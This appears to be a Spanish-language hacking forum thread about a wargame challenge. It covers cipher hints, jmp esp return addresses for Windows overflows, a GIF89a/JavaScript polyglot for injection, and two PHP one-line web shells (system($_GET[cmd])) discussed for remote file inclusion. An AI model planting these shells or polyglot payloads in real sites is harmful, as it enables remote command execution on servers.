Mensajes

No no como que le vamos a hacer algo a Uxio, si todo era broma del 28   


Les envio las estrategias por PM, ahora si pasaremos la prueba muahahaha.

PD: toda comunicacion cifrada par aque no quede evidencia!!

@Uxio

A va ya vi es cierto, esqu estos dias ando un poco Off y no me doy tiempo de muchas cosas. Felicidades.

@WHK

Sale deja voy por el bat de baseball

@Carloswaldo

No es necesario atropellarlo, solo con que golpearlo esta bien y que nos de mas pistas del carrito.

Saludos y Exelentes fiestas de año nuevo.

A mmm, seguro era una broma del dia 28 no ?

Ajá, ya lo superé

wtf?!?!?!   

Pues yo pensé que era codificación ROT13, pero veo que no es así. Alguna pista de los que ya la pasaron

Pues efectivamente no es ROT13 de hecho es mas simple de lo que se ve, lo de los musculos espero y comprendas por donde va.

Ahora:

Comno cualquier juego de aventura XD, usaste analisis de frecuencias?

Pues no creo que fuese el analisis de frecuencias, el comento que ya lo habia resuelto pero que no daba, mas bien uso las pistas que dan a otras pistas, mas bien entendio el mensaje en formato espia.

Saludos.

Lastima que este off...

A si me falta esto:

Saludos!!

por lo del sp entre 1 y 2 o 3, lo que cambia son las direcciones que tienes que usar como RET al jmp esp, sin embargo deberia de funcionar tratandose de windows XP 64 bits Los ejemplos pueden cambiar drasticamente, pero sinceramente no lo he probado a 64 bits y tampoco con windows Vista.

Saludos.

Aaaa entonces es una prueba de Ingenieria Social  eso si amerita mas puntos, por que para hacerse pasar por alguien de la familia de sdc y engañarlo mediante correo electronico, necesitas realizar un MIM y conseguir las llaves PGP y tambien el pass phrase ya que el mantiene todas sus conversaciones cifradas  Definitivamente la prueba amerita unos 30 Puntos en caso de pasarse de esa manera .

Pero ahora que lo pienso mejor, segun recuerdo la prueba no fue hecha por sdc, si no mas bien por Crack_X asi que no se va a poder aplicar Ingenieria Social  .

En fin que mas le hacemos. Yo tambien he estado sumando y restando como loco y pss naaa.

Saludos.

Bien si vemos si lo vemos como javascript se prodria entender un poco mejor.

Código (javascript) [Seleccionar] Expandir


GIF89a=1
/*Basura Binaria whatever!!*/
alert("xD");
/*Mas basura*/


Eso es para injectar JS desde alguna pagina vulnerable, se podria injectar PHP o cualquier otro leguje, sin embargo
para el php como pueden ver en la imagen de muestra de ese ejemplo:
:http://www.flickr.com/photos/matteocarli/580869084/

No importan los caracteres Binarios, ahora lo que si importa es el navegador. shimpei no me he puesto a ver la secuencia hexadecimal que se genera pero me imagino que si entendistes el ejemplo si va a funcionar.

Saludos!

Hola que tal, sobre tu duda

disculpen mi ignorancia sobre rfi pero en los casos en los que se utilizarian
<?php system($_GET[cmd]); ?>
o
<? if(isset($_GET[cmd])) system($_GET[cmd]) ?>
serian si el server donde esta alojado corre bajo windows no? si es un unix tambien funcionaria?

Las funciones son propias de PHP no importa el sistema, siempre y cuando esten activadas dichas funciones. la de isset es obvio que va a estar, pero la de system() puede ser que este bloqueada o restringida.

Saludos.